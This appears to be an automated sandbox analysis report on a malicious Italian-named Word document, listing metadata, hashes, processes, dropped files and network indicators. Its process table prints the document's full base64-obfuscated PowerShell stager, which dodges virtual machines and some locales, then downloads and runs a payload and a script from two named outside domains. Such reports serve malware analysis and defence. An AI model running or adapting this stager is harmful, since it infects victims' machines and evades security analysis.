File name: | Avviso-78291.doc |
Full analysis: | https://app.any.run/tasks/e7155ec1-9ff2-4439-a03e-467e654b4e1a |
Verdict: | Malicious activity |
Analysis date: | September 11, 2019, 12:03:05 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.3, Code page: 1252, Author: Administrator, Template: Normal.dotm, Last Saved By: Administrator, Revision Number: 8, Name of Creating Application: Microsoft Office Word, Total Editing Time: 21:00, Create Time/Date: Sun Sep 8 16:10:00 2019, Last Saved Time/Date: Sun Sep 8 19:16:00 2019, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0 |
MD5: | 1BF62E899C6D2C3FF427C8ED6DBFCC48 |
SHA1: | 4A87DB7669F4700FCD6127F3D9906BA389AB3BE1 |
SHA256: | 3796C0F937BEE2199E72A3CAACD80C625393C64218B8610361A94D4AA1E2B148 |
SSDEEP: | 1536:qC3hskRSSuclIyTPHkDD+WZbS+a92h3fmz:qIRSSuclIyoDD/J |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 1 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 1 |
Words: | - |
Pages: | 1 |
ModifyDate: | 2019:09:08 18:16:00 |
CreateDate: | 2019:09:08 15:10:00 |
TotalEditTime: | 21.0 minutes |
Software: | Microsoft Office Word |
RevisionNumber: | 8 |
LastModifiedBy: | Administrator |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | Administrator |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2852 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Avviso-78291.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2244 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [string][System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String( 'O2lmKCgoR2V0LVVJQ3VsdHVyZSkuTmFtZSAtbWF0Y2ggIkNOfFJPfFJVfFVBfEJZIikgLW9yICgoR2V0LVdtaU9iamVjdCAtY2xhc3MgV2luMzJfQ29tcHV0ZXJTeXN0ZW0gLVByb3BlcnR5IE1vZGVsKS5Nb2RlbCAtbWF0Y2ggIlZpcnR1YWxCb3h8Vk13YXJlfEtWTXxIVk0iKSl7ZXhpdDt9OyRhPUpvaW4tUGF0aCAkZW52OlB1YmxpYyAiXExpYnJhcmllc1xXaW5kb3dzSW5kZXhpbmdTZXJ2aWNlLmpzIjskYj1Kb2luLVBhdGggJGVudjp0ZW1wICJBZG9iZUFSLmV4ZSI7dHJ5eyhOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkRmlsZSgiaHR0cDovL3Nlci5qb25uYWxiYW5kaWFuLmNvbS9sYXN0dXBkYXRlLnppcD9jY3doZyIsJGIpOyBTdGFydC1Qcm9jZXNzICRiO31jYXRjaHt9Ozt0cnl7KE5ldy1PYmplY3QgTmV0LldlYkNsaWVudCkuRG93bmxvYWRTdHJpbmcoImh0dHA6Ly93d3MuY2hyaXN0aW5lZGF2aWVzLmJpei8/cGFnZT1yaW5nJnZpZD1waXQ3JnRlZ3pqIil8b3V0LWZpbGUgJGE7U3RhcnQtUHJvY2VzcyAkYTt9Y2F0Y2h7fTs=' ) );iex $a; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WINWORD.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2852 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA7FC.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2244 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8NUTB7FIBHS1ZZ76RNCM.temp | — | |
MD5:— | SHA256:— | |||
2852 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:B7DEA70F335E5DDC93FE702864A27887 | SHA256:5E4B0BB068B9758D42C59BDBB3E585A771C8BE51EE88F713369718C081896434 | |||
2852 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$viso-78291.doc | pgc | |
MD5:9055771E7FA25C203B255D3C0432E788 | SHA256:50219335A689C4256B3C3E9A9E3FA59748643B6FD16A1CD5FF94B5E271F27FFF | |||
2244 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF16b78d.TMP | binary | |
MD5:0F2CAD9746414ABA31294C3B560FCFD5 | SHA256:19AD383DED364BB44DED7C7CF00EB6254E5E98D696632944F6BC36724306EE15 | |||
2244 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:0F2CAD9746414ABA31294C3B560FCFD5 | SHA256:19AD383DED364BB44DED7C7CF00EB6254E5E98D696632944F6BC36724306EE15 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2244 | powershell.exe | GET | — | 31.214.157.93:80 | http://wws.christinedavies.biz/?page=ring&vid=pit7&tegzj | NL | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2244 | powershell.exe | 185.158.248.239:80 | ser.jonnalbandian.com | M247 Ltd | RO | unknown |
2244 | powershell.exe | 31.214.157.93:80 | wws.christinedavies.biz | easystores GmbH | NL | unknown |
Domain | IP | Reputation |
---|---|---|
ser.jonnalbandian.com |
| unknown |
dns.msftncsi.com |
| shared |
wws.christinedavies.biz |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
— | — | Potentially Bad Traffic | ET INFO Observed DNS Query to .biz TLD |